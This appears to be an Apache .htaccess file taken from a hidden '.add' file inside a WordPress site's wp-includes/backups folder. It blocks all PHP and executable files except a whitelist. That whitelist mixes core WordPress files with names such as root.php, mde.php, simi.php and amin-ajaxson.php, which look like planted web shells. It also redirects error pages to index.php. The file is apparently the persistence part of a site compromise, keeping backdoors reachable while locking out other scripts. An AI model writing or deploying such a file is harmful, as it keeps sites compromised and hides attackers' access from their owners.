File: /home/roshanchandy/public_html/buildmydesign.in/wp-includes/backups/.add
<FilesMatch ".(PhP|php7|php5|suspected|phtml|py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(root.php|mde.php|simi.php|wordfence-waf.php|error.php|index.php|amin-ajaxson.php|class-wp-edits.php|Mailo.php|consol.php|module.audio.flow.php|nux.php|icon.php|colour.php|contact.php|foter.php|header.php|module.php|register.php|profile.php|webix.php|wincust.php|service.php|wp-login.php|wp-blog-header.php|admin-ajax.php|wp-config.php|wp-db.php|pluggable.php|wp-config-sample.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
# Custom error handling
ErrorDocument 403 /index.php
ErrorDocument 404 /index.php